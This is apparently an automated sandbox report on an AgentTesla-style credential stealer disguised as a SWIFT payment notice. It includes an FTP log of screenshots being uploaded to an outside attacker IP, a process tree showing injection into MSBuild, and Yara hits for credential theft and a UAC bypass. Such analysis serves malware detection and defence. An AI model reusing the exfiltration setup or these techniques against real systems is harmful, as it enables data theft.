Aug 18, 2024 18:31:27.144285917 CEST	21	54709	104.247.165.99	192.168.2.5	150 Accepted data connection
Aug 18, 2024 18:31:28.280816078 CEST	21	54709	104.247.165.99	192.168.2.5	226-File successfully transferred 226-File successfully transferred226 1.136 seconds (measured here), 57.37 Kbytes per second
Aug 18, 2024 18:31:34.994852066 CEST	54709	21	192.168.2.5	104.247.165.99	PASV
Aug 18, 2024 18:31:35.220156908 CEST	21	54709	104.247.165.99	192.168.2.5	227 Entering Passive Mode (104,247,165,99,255,40)
Aug 18, 2024 18:31:35.227209091 CEST	54709	21	192.168.2.5	104.247.165.99	STOR SC_user-610930_2024_12_15_16_24_58.jpeg
Aug 18, 2024 18:31:35.843422890 CEST	21	54709	104.247.165.99	192.168.2.5	150 Accepted data connection
Aug 18, 2024 18:31:36.306984901 CEST	21	54709	104.247.165.99	192.168.2.5	226-File successfully transferred 226-File successfully transferred226 0.463 seconds (measured here), 140.85 Kbytes per second
Aug 18, 2024 18:31:43.554930925 CEST	54709	21	192.168.2.5	104.247.165.99	PASV
Aug 18, 2024 18:31:43.781168938 CEST	21	54709	104.247.165.99	192.168.2.5	227 Entering Passive Mode (104,247,165,99,251,168)
Aug 18, 2024 18:31:43.786690950 CEST	54709	21	192.168.2.5	104.247.165.99	STOR SC_user-610930_2024_12_22_00_46_22.jpeg
Aug 18, 2024 18:31:44.559139967 CEST	21	54709	104.247.165.99	192.168.2.5	150 Accepted data connection
Aug 18, 2024 18:31:45.042337894 CEST	21	54709	104.247.165.99	192.168.2.5	226-File successfully transferred 226-File successfully transferred226 0.636 seconds (measured here), 102.51 Kbytes per second
Aug 18, 2024 18:31:46.916713953 CEST	54709	21	192.168.2.5	104.247.165.99	PASV
Aug 18, 2024 18:31:47.143198967 CEST	21	54709	104.247.165.99	192.168.2.5	227 Entering Passive Mode (104,247,165,99,247,186)
Aug 18, 2024 18:31:47.152854919 CEST	54709	21	192.168.2.5	104.247.165.99	STOR SC_user-610930_2024_12_25_19_07_28.jpeg
Aug 18, 2024 18:31:47.763725042 CEST	21	54709	104.247.165.99	192.168.2.5	150 Accepted data connection
Aug 18, 2024 18:31:48.474139929 CEST	21	54709	104.247.165.99	192.168.2.5	226-File successfully transferred 226-File successfully transferred226 0.463 seconds (measured here), 150.66 Kbytes per second
Aug 18, 2024 18:31:48.507780075 CEST	21	54709	104.247.165.99	192.168.2.5	226-File successfully transferred 226-File successfully transferred226 0.463 seconds (measured here), 150.66 Kbytes per second
Aug 18, 2024 18:31:53.933923960 CEST	54709	21	192.168.2.5	104.247.165.99	PASV
Aug 18, 2024 18:31:54.332743883 CEST	21	54709	104.247.165.99	192.168.2.5	227 Entering Passive Mode (104,247,165,99,207,0)
Aug 18, 2024 18:31:54.347193003 CEST	54709	21	192.168.2.5	104.247.165.99	STOR SC_user-610930_2024_12_31_01_48_37.jpeg
Aug 18, 2024 18:31:54.971827030 CEST	21	54709	104.247.165.99	192.168.2.5	150 Accepted data connection
Aug 18, 2024 18:31:55.459788084 CEST	21	54709	104.247.165.99	192.168.2.5	226-File successfully transferred 226-File successfully transferred226 0.485 seconds (measured here), 134.44 Kbytes per second
Aug 18, 2024 18:32:00.710980892 CEST	54709	21	192.168.2.5	104.247.165.99	PASV
Aug 18, 2024 18:32:00.937393904 CEST	21	54709	104.247.165.99	192.168.2.5	227 Entering Passive Mode (104,247,165,99,253,179)
Aug 18, 2024 18:32:00.943945885 CEST	54709	21	192.168.2.5	104.247.165.99	STOR SC_user-610930_2025_01_04_23_02_47.jpeg
Aug 18, 2024 18:32:01.566754103 CEST	21	54709	104.247.165.99	192.168.2.5	150 Accepted data connection
Aug 18, 2024 18:32:02.880126953 CEST	21	54709	104.247.165.99	192.168.2.5	226-File successfully transferred 226-File successfully transferred226 0.484 seconds (measured here), 134.78 Kbytes per second
Aug 18, 2024 18:32:02.881829977 CEST	21	54709	104.247.165.99	192.168.2.5	226-File successfully transferred 226-File successfully transferred226 0.484 seconds (measured here), 134.78 Kbytes per second
Aug 18, 2024 18:32:02.882865906 CEST	21	54709	104.247.165.99	192.168.2.5	226-File successfully transferred 226-File successfully transferred226 0.484 seconds (measured here), 134.78 Kbytes per second
Aug 18, 2024 18:32:06.742815971 CEST	54709	21	192.168.2.5	104.247.165.99	PASV
Aug 18, 2024 18:32:06.969521046 CEST	21	54709	104.247.165.99	192.168.2.5	227 Entering Passive Mode (104,247,165,99,248,17)
Aug 18, 2024 18:32:06.975121975 CEST	54709	21	192.168.2.5	104.247.165.99	STOR SC_user-610930_2024_08_18_12_32_05.jpeg
Aug 18, 2024 18:32:07.584602118 CEST	21	54709	104.247.165.99	192.168.2.5	150 Accepted data connection
Aug 18, 2024 18:32:08.059526920 CEST	21	54709	104.247.165.99	192.168.2.5	226-File successfully transferred 226-File successfully transferred226 0.463 seconds (measured here), 141.32 Kbytes per second

Target ID:	0
Start time:	12:27:55
Start date:	18/08/2024
Path:	C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe"
Imagebase:	0x21d5d1f0000
File size:	2'824'749 bytes
MD5 hash:	111377F936CDA72A8ACA49F346EFA7E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2339874172.0000021D6F933000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2339874172.0000021D6F933000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2338417388.0000021D5F170000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	12:27:55
Start date:	18/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	12:28:00
Start date:	18/08/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Wow64 process (32bit):
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Imagebase:
File size:	43'008 bytes
MD5 hash:	9827FF3CDF4B83F9C86354606736CA9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	12:28:01
Start date:	18/08/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
Imagebase:	0xa00000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.4521867809.0000000002E0E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4519630330.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.4519630330.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4521867809.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.4521867809.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	12:28:01
Start date:	18/08/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
Imagebase:	0xda0000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	12:28:01
Start date:	18/08/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 7032 -s 1032
Imagebase:	0x7ff75c660000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	15.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	6
Total number of Limit Nodes:	0

Executed Functions

Function 00007FF848DAAB40 Relevance: 2.0, Strings: 1, Instructions: 734
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 00007FF848DAD81F

Memory Dump Source

Source File: 00000000.00000002.2343561989.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848da0000_EUR Swift Bildirimi12-08-2024.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: acf342cbd10ad9d32dcb7cefe8a590163208da914039ae255233ec859b4a9aef
Instruction ID: 1b4b29244f1a37583b7718ea9554ed5ed0f223ae4d9d927ee2748f63634f1178
Opcode Fuzzy Hash: acf342cbd10ad9d32dcb7cefe8a590163208da914039ae255233ec859b4a9aef
Instruction Fuzzy Hash: 8B225230A1EB4A4FE348EA2894856B177E0FF55350F2442BAC44FC719BDF28E846C785

Function 00007FF848DAD16D Relevance: 1.5, Strings: 1, Instructions: 269
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

xH, xrefs: 00007FF848DAD18B

Memory Dump Source

Source File: 00000000.00000002.2343561989.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848da0000_EUR Swift Bildirimi12-08-2024.jbxd

Similarity

API ID:
String ID: xH
API String ID: 0-2244353955
Opcode ID: 39b428df7ef530bcea902c420616b5ba76f4b700b0c16184cf3a55d830c8faee
Instruction ID: 98d5f648e49cdbe730e6369945d8035714a071dcac075d1af0539a3d4723a902
Opcode Fuzzy Hash: 39b428df7ef530bcea902c420616b5ba76f4b700b0c16184cf3a55d830c8faee
Instruction Fuzzy Hash: 5F71F631B1DB0A4FD768FA28D8565BA73E1FF95350F10053EE58BC3282DE29F8468685

Function 00007FF848DABEF0 Relevance: 1.6, APIs: 1, Instructions: 149
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00007FF848DABFDD

Memory Dump Source

Source File: 00000000.00000002.2343561989.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848da0000_EUR Swift Bildirimi12-08-2024.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 8e55686198bd253685fc82b057f006aee600a265089a7c3b22bce763d4925297
Instruction ID: 95cd417380754b16a51d26cb4278144a2283ed22f324b407a7787de7548de142
Opcode Fuzzy Hash: 8e55686198bd253685fc82b057f006aee600a265089a7c3b22bce763d4925297
Instruction Fuzzy Hash: 8841277180E7C84FD71A9B685C156F97FE1EF66310F0842AFE089C7193DB68580AC796

Function 00007FF848DA092D Relevance: 1.6, APIs: 1, Instructions: 110
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeConsole.KERNELBASE ref: 00007FF848DA09CF

Memory Dump Source

Source File: 00000000.00000002.2343561989.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848da0000_EUR Swift Bildirimi12-08-2024.jbxd

Similarity

API ID: ConsoleFree
String ID:
API String ID: 771614528-0
Opcode ID: 297e6f01799d604d5c58af88cf8f811d3a4e5163fb00844b1dc5ebafb865eb04
Instruction ID: 7798b5312554b1691d7c43015eee017031f128e9faef369648246891d51bcf32
Opcode Fuzzy Hash: 297e6f01799d604d5c58af88cf8f811d3a4e5163fb00844b1dc5ebafb865eb04
Instruction Fuzzy Hash: AD31A43150DB488FDB15DF99C849BE9BBF4EF56320F04426FD089C3552D768A84ACB51

Function 00007FF848DA06B0 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeConsole.KERNELBASE ref: 00007FF848DA09CF

Memory Dump Source

Source File: 00000000.00000002.2343561989.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848da0000_EUR Swift Bildirimi12-08-2024.jbxd

Similarity

API ID: ConsoleFree
String ID:
API String ID: 771614528-0
Opcode ID: c31783e686dc3d3cbe058eba343e1022b539fb124a8258c61c59de3602836986
Instruction ID: 981880b1b21db8e427398fabfc74395c903900d061a6ea043e2daacbf2631b1b
Opcode Fuzzy Hash: c31783e686dc3d3cbe058eba343e1022b539fb124a8258c61c59de3602836986
Instruction Fuzzy Hash: 7421B47090DB4C8FEB18EF59D849BFABBE0EB55320F10426ED08AD3552DB64A849CB51

Function 00007FF848E90077 Relevance: .5, Instructions: 484COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2343956527.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e90000_EUR Swift Bildirimi12-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 480f93643db464205b89769b773f0263b4979bfc289f763f5767e86a96c5ac99
Instruction ID: aab4c31492bbf00d2ccbc2a8852c922c14042173712af57b8f23c93066a9259d
Opcode Fuzzy Hash: 480f93643db464205b89769b773f0263b4979bfc289f763f5767e86a96c5ac99
Instruction Fuzzy Hash: 12E1267180DBCA8FE756FB6888555B47FE0FF66344F5805FAC089CB093EA686846C345

Function 00007FF848E90EF8 Relevance: .4, Instructions: 387COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2343956527.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e90000_EUR Swift Bildirimi12-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33066aebf9b3a8c9f5e43fe0345035f16197aa0948717c46844011ca0b9ba7e4
Instruction ID: 4769d05d6e54c6efa97e7d157d6710c00e5a0310b883f0c4bb63a44073206df3
Opcode Fuzzy Hash: 33066aebf9b3a8c9f5e43fe0345035f16197aa0948717c46844011ca0b9ba7e4
Instruction Fuzzy Hash: 6BB15A72C0DAC98FE756FB2888551A87FE0FF56354F0806FAC489CB192E66D6849C391

Function 00007FF848E910C9 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2343956527.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e90000_EUR Swift Bildirimi12-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3caaeb2fb90927386dca8e100d3183a46bdf713e83b0fb0544d47908db542f1
Instruction ID: 5e64ac9ebb189c8627fb6f63c3eb0b85788bcd2c4d995ab5f3cdde677e8ace57
Opcode Fuzzy Hash: e3caaeb2fb90927386dca8e100d3183a46bdf713e83b0fb0544d47908db542f1
Instruction Fuzzy Hash: 2B412632D0CA8D8FEB49FF68D8555A97BA0FF65348F0501BAC04AC7192EB7AA845C741

Non-executed Functions

Function 00007FF848DA11E2 Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2343561989.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848da0000_EUR Swift Bildirimi12-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22a3eeec4eee18b9c4c538ccd2a91a7c022c8362f6b99843c5f41ec21819d10b
Instruction ID: cf0b1b5ee57cc316188d5361dd7d307d114be3f63e381ad2f8a483f4d948485b
Opcode Fuzzy Hash: 22a3eeec4eee18b9c4c538ccd2a91a7c022c8362f6b99843c5f41ec21819d10b
Instruction Fuzzy Hash: 5A513717B0F5E69EEB117B7C7C191FABB50EB567B1B1802F7D085CB097D908A40A8394

Analysis Process: MSBuild.exePID: 6536, Parent PID: 7032COMMON

Execution Graph

Execution Coverage:	10.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	11
Total number of Limit Nodes:	2

Executed Functions

Function 0137CF20 Relevance: 3.6, Strings: 1, Instructions: 2302COMMON

Download Yara Rule

Strings

,bzq, xrefs: 0137D25F

Memory Dump Source

Source File: 00000004.00000002.4521382528.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1370000_MSBuild.jbxd

Similarity

API ID:
String ID: ,bzq
API String ID: 0-1914765314
Opcode ID: 62f147c2561475f109938f2f57cfee1177c75cde5e449f463101a6ce281d334d
Instruction ID: 6ddaf1ec33483da686455af7537e318692b608f181915c54addb043be830391b
Opcode Fuzzy Hash: 62f147c2561475f109938f2f57cfee1177c75cde5e449f463101a6ce281d334d
Instruction Fuzzy Hash: DC331E31D107198EDB11EF68C8846ADF7B1FF99304F15C79AE458A7221EB70AAC5CB81

Function 01379BB0 Relevance: 2.9, Instructions: 2852COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4521382528.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1370000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e0b21b93c9a22409532fbb311c2962c893c2f698f88c5dea7bff61e0be4b78f
Instruction ID: af80ddf564988bc5b4862b2b8ab77a33801c7154c09b3611cb59b3556a916fa6
Opcode Fuzzy Hash: 9e0b21b93c9a22409532fbb311c2962c893c2f698f88c5dea7bff61e0be4b78f
Instruction Fuzzy Hash: 6863FA31D10B1A8EDB11EB68C8946A9F7B1FF99300F15D79AE45877121EB70AAC4CF81

Function 01374A60 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4521382528.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1370000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1f1509867265b624d20c69e473578956560d52da2905626a0de529e637ac8b8
Instruction ID: 848a8c9f1960c2882d8d8c9a30a3f2019e9c89dfc38dc829c6dd759fad66fa6b
Opcode Fuzzy Hash: d1f1509867265b624d20c69e473578956560d52da2905626a0de529e637ac8b8
Instruction Fuzzy Hash: 42B17E70E00209DFDF24CFA9D9857ADBBF2AF88318F148529D455E7394EB78A845CB81

Function 01373E48 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4521382528.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1370000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ab17c3112f64ee49cfe5b1bdbc0583223e5f4b378cacbbc85662e56d5bc8b50
Instruction ID: 0bb49b1dc7309a2fc280dab70fe3eab8905e18599feb86715a0ff8a29fd5b098
Opcode Fuzzy Hash: 1ab17c3112f64ee49cfe5b1bdbc0583223e5f4b378cacbbc85662e56d5bc8b50
Instruction Fuzzy Hash: 3B917C71E00209DFDF24DFA9D8857DDBBF2BF88318F148129E419A7294EB789845CB81

Function 01376EA2 Relevance: 2.6, Strings: 2, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LRcq, xrefs: 01376FB2
LRcq, xrefs: 01376ED6

Memory Dump Source

Source File: 00000004.00000002.4521382528.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1370000_MSBuild.jbxd

Similarity

API ID:
String ID: LRcq$LRcq
API String ID: 0-1357215051
Opcode ID: 7cc7635c709814fe0168747b764655029719ac201ba1e067db99768f315a01a5
Instruction ID: 32fd7d1392a6996001865bb818c523f0d1f28dd56052aa4772a5717ca0d112b2
Opcode Fuzzy Hash: 7cc7635c709814fe0168747b764655029719ac201ba1e067db99768f315a01a5
Instruction Fuzzy Hash: 6251D670E106068FEB25DF68C8517AEBBB6FF86314F10846EE405EB355EB789846CB41

Function 0623E0D8 Relevance: 1.6, APIs: 1, Instructions: 133
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.4528234935.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6230000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1531e7a38cd00c233009927c465db4aab1d1e38ff7742673ab38c0e41c6017ca
Instruction ID: 0f03f6d3a8a727a07d40a268e2af8de16b50062f6b6a2b1150c5e71935207b96
Opcode Fuzzy Hash: 1531e7a38cd00c233009927c465db4aab1d1e38ff7742673ab38c0e41c6017ca
Instruction Fuzzy Hash: D941E2B2D143968FCB14CF79D8142AEBFF1AF89310F1586ABD884E7251DB389845CB91

Function 0623E1C0 Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNELBASE(8B550531), ref: 0623E227

Memory Dump Source

Source File: 00000004.00000002.4528234935.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6230000_MSBuild.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 67acfadfb174ffef71bc39a09cdedd0b10e2e98eb2e0bf9ca55aca0d85213226
Instruction ID: 5fa569467825990e763f7c38f79828be6abaa3cd5055a6e474ec4a4e6bde6345
Opcode Fuzzy Hash: 67acfadfb174ffef71bc39a09cdedd0b10e2e98eb2e0bf9ca55aca0d85213226
Instruction Fuzzy Hash: 6D11F3B1C1065A9BCB10DF9AD544BDEFBF4EF48320F15816AD818A7640D378A944CFA5

Function 0137F465 Relevance: 1.4, Strings: 1, Instructions: 110COMMON

Download Yara Rule

Strings

PHcq, xrefs: 0137F5B3

Memory Dump Source

Source File: 00000004.00000002.4521382528.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1370000_MSBuild.jbxd

Similarity

API ID:
String ID: PHcq
API String ID: 0-4245845256
Opcode ID: 892981ec2ebd05b8b5dc1a2422b9dae7b29ca924c8dd0ef3c893e84d66563924
Instruction ID: ea078dd16a1bff3756120b3ab4bf18915d7de25386fd113b7d72d64da821bf3a
Opcode Fuzzy Hash: 892981ec2ebd05b8b5dc1a2422b9dae7b29ca924c8dd0ef3c893e84d66563924
Instruction Fuzzy Hash: 8031CE30B002068FDB2A9F38C55466E7BA7BF88214F244969E406DB385DF38DD46CB90

Function 01376F40 Relevance: 1.3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

LRcq, xrefs: 01376FB2

Memory Dump Source

Source File: 00000004.00000002.4521382528.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1370000_MSBuild.jbxd

Similarity

API ID:
String ID: LRcq
API String ID: 0-4134321033
Opcode ID: ac1ad79908404be8b431360acb6a7f3d21e45f8c342e465d47a31d41b55e3be6
Instruction ID: 01214634a5557f511918c1115e30938d084592333ecb298e34e2fc1c139d4875
Opcode Fuzzy Hash: ac1ad79908404be8b431360acb6a7f3d21e45f8c342e465d47a31d41b55e3be6
Instruction Fuzzy Hash: 3931D571E1060A8FEB35CFA9C85579EB7B6FF85318F50842AE405EB241EB74D849CB40

Function 01376B68 Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

LRcq, xrefs: 01376B9F

Memory Dump Source

Source File: 00000004.00000002.4521382528.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1370000_MSBuild.jbxd

Similarity

API ID:
String ID: LRcq
API String ID: 0-4134321033
Opcode ID: 552e787d6c558c08a81ced1688bb4f61766ac87e23e25836dbf27cef4262bacc
Instruction ID: fe760adcea3a84889ffab01f0557018cb73c8b19f6ddbce197cb6164705ba6e2
Opcode Fuzzy Hash: 552e787d6c558c08a81ced1688bb4f61766ac87e23e25836dbf27cef4262bacc
Instruction Fuzzy Hash: 802156317082419FC312EB7CC46066EBFB6EF87304B1548EED149CB366EA799845C792

Function 0137798A Relevance: .6, Instructions: 555COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4521382528.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1370000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08f3e8db17c19acc52c6f48f9ac215f6a39ee2000032fe263e0d556390d7e89f
Instruction ID: e95d41fae560429ac0ba1c5c816dcd2719e00bc8d963805aaea049e0a1e71e89
Opcode Fuzzy Hash: 08f3e8db17c19acc52c6f48f9ac215f6a39ee2000032fe263e0d556390d7e89f
Instruction Fuzzy Hash: 54124D347101038BCB2AAB3CE98476872A7FB95354F20597EE505CB3A5DE79DC86CB81

Function 01379760 Relevance: .4, Instructions: 355COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4521382528.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1370000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc6c53dc934bc1903edfa8c015edf2700d21278ad95d6eb7ac3332bfba4a1c91
Instruction ID: fc1df0e555266984b3e89fcd0ee621bc71395138ca0d79e5bb87c908da8fe5ac
Opcode Fuzzy Hash: bc6c53dc934bc1903edfa8c015edf2700d21278ad95d6eb7ac3332bfba4a1c91
Instruction Fuzzy Hash: DFD1C071A002058FDB21DF69D8807AEBBB5FB88328F24866AE509DB395D735D841CB91

Function 013793E4 Relevance: .3, Instructions: 318COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4521382528.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1370000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6017860e75ae0f8970b3cf13218ab9f2fc51eb190e396846b3f89468c7fe6d30
Instruction ID: c560ab12ce138017b1da8c53d43bbb9069aedcb73ac811a877d4ff0b3637f788
Opcode Fuzzy Hash: 6017860e75ae0f8970b3cf13218ab9f2fc51eb190e396846b3f89468c7fe6d30
Instruction Fuzzy Hash: 9CC18034A002158FDB25DF79D584AADBBB6FF88328F208669E906DB365DB34DC41CB40

Function 01374A56 Relevance: .3, Instructions: 262COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4521382528.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1370000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d4535836cfdcd884eaa95804868ea87769cac3f8f5b6b592dc0e21762b399ea
Instruction ID: f40e7a93298a071276b8efb3cd062619d72d3ee3123eb6b1d5f76eaa7d262572
Opcode Fuzzy Hash: 8d4535836cfdcd884eaa95804868ea87769cac3f8f5b6b592dc0e21762b399ea
Instruction Fuzzy Hash: A3B16D70E00209DFDF20CFA9D9857ADBBF2BF48318F148529D859E7254EB78A845CB91

